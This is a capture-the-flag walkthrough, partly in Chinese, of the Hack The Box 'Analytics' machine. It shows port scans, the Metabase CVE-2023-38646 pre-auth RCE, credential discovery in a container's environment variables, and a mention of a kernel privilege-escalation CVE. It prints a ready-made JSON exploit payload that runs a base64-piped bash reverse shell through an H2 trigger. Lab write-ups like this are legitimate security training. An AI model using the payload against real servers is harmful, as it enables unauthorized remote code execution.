Analytics
Machine:Linux
Level:Easy
Nmap
└─# nmap -p- --min-rate 10000 10.10.11.233
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
└─# nmap -p 80 -sCV 10.10.11.233
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://analytical.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
User Access
CVE Exploitation
Login 跳转到 Metabase 界面 ,存在CVE-2023-38646并通过验证。
└─# ./xpoc_linux_amd64 -r 403 -t http://data.analytical.htb/
__ /\ /\_. ___. _____
| |/ / / __.\/ __.\/ ____|
| /XRAY™/_/ / / / / /
/ . | / .___/ /_/ / /___.
/ /|_| / / \____/\____/
\/v0.0.8\/cloud plugins: [410]
[INFO] 2023-10-08 02:49:03 use config at: /root/.xray/xpoc-config.yaml [strategy.go:30]
[INFO] 2023-10-08 02:49:03 load plugins form: [/root/.xray/xpoc/plugins] [loader.go:126]
[INFO] 2023-10-08 02:49:03 load plugins form: [/root/.xray/xpoc/plugins/metabase-setup-validate-rce.yml.bin] [loader.go:126]
[INFO] 2023-10-08 02:49:04 [1] Website: [200 OK] http://data.analytical.htb/
[INFO] 2023-10-08 02:49:05 [1] Vulnerability: poc-yaml-metabase-setup-validate-rce
├── target : http://data.analytical.htb/
╰── links : https://stack.chaitin.com/techblog/detail?id=140
通过/api/session/properties获取setup-token并 POST/api/setup/validate,在本机监听相关端口即可。
{
"token": "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx",
"details":
{
"is_on_demand": false,
"is_full_sync": false,
"is_sample": false,
"cache_ttl": null,
"refingerprint": false,
"auto_run_queries": true,
"schedules":
{},
"details":
{
"db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {echo,REVERSE SHELL}|{base64,-d}|{bash,-i}')\n$$--=x",
"advanced-options": false,
"ssl": true
},
"name": "test",
"engine": "h2"
}
}
Get User Account
检查环境发现是docker。
/ $ ls -al /
total 92
drwxr-xr-x 1 root root 4096 Oct 8 08:36 .
drwxr-xr-x 1 root root 4096 Oct 8 08:36 ..
-rwxr-xr-x 1 root root 0 Oct 8 08:36 .dockerenv
...
还以为是docker逃逸结果发现什么命令都无法执行,结合题目难度怀疑是在文件中包含账密信息,但还是上传了 linpeans 查看了一下,在环境中获取账密。
╔══════════╣ Environment
╚ Any private information inside environment variables?
HISTFILESIZE=0
MB_LDAP_BIND_DN=
LANGUAGE=en_US:en
USER=metabase
HOSTNAME=3654f44bdfa3
FC_LANG=en-US
SHLVL=5
LD_LIBRARY_PATH=/opt/java/openjdk/lib/server:/opt/java/openjdk/lib:/opt/java/openjdk/../lib
HOME=/home/metabase
OLDPWD=/
MB_EMAIL_SMTP_PASSWORD=
LC_CTYPE=en_US.UTF-8
JAVA_VERSION=jdk-11.0.19+7
LOGNAME=metabase
_=linpeas.sh
MB_DB_CONNECTION_URI=
PATH=/opt/java/openjdk/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
MB_DB_PASS=
MB_JETTY_HOST=0.0.0.0
META_PASS=[deleted]
LANG=en_US.UTF-8
MB_LDAP_PASSWORD=
HISTSIZE=0
SHELL=/bin/sh
MB_EMAIL_SMTP_USERNAME=
MB_DB_USER=
META_USER=[deleted]
LC_ALL=en_US.UTF-8
JAVA_HOME=/opt/java/openjdk
PWD=/tmp
HISTFILE=/dev/null
MB_DB_FILE=//metabase.db/metabase.db
Root Access
在对靶机的信息枚举中发现内核为Ubuntu 22.04 LTS (Jammy) Versions 6.2.0,该内核具有CVE-2023-2640。
╔════════════════════╗
══════════════════════════════╣ System Information ╠══════════════════════════════
╚════════════════════╝
╔══════════╣ Operative system
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits
Linux version 6.2.0-25-generic (buildd@lcy02-amd64-044) (x86_64-linux-gnu-gcc-11 (Ubuntu 11.3.0-1ubuntu1~22.04.1) 11.3.0, GNU ld (GNU Binutils for Ubuntu) 2.38) #25~22.04.2-Ubuntu SMP PREEMPT_DYNAMIC Wed Jun 28 09:55:23 UTC 2
Distributor ID: Ubuntu
Description: Ubuntu 22.04.3 LTS
Release: 22.04
Codename: jammy
实际上使用 POC 读取相关文件即可,当然也可以使用反向shell 连接获取更加清晰的内容。